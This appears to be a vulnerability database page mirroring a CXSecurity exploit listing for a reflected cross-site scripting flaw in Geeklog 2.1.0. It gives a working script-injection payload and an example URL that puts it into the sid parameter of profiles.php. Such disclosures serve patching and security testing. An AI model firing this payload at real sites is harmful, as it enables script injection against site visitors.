Geeklog 2.1.0 Cross Site Scripting - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1769596 漏洞类型
发布时间 2019-10-06 更新时间 2019-10-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019100027
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################
# Exploit title : Geeklog 2.1.0 Cross Site Scripting 
# Google Dork : N/A
# Date : 06.10.2019
# Exploit Author : Mikayıl İlyas 
# Twitter : https://twitter.com/mikayil_ilyas
# Vendor Homepage : https://www.geeklog.net/
# Software download : https://www.geeklog.net/downloads/visit.php/file_5b324b8ed4c56
# Version : 2.1.0
# Tested on : Windows 10 / Kali Linux  
# CVE : 
# Vulnerability Type : Cross site scripting / XSS
#################################################################################################

# Payload : '"()"><script>alert('xss')</script> 

# Example : http://127.0.0.1/sc/public_html/profiles.php?sid=welcome'"()"><script>alert('xss')</script>&what=emailstory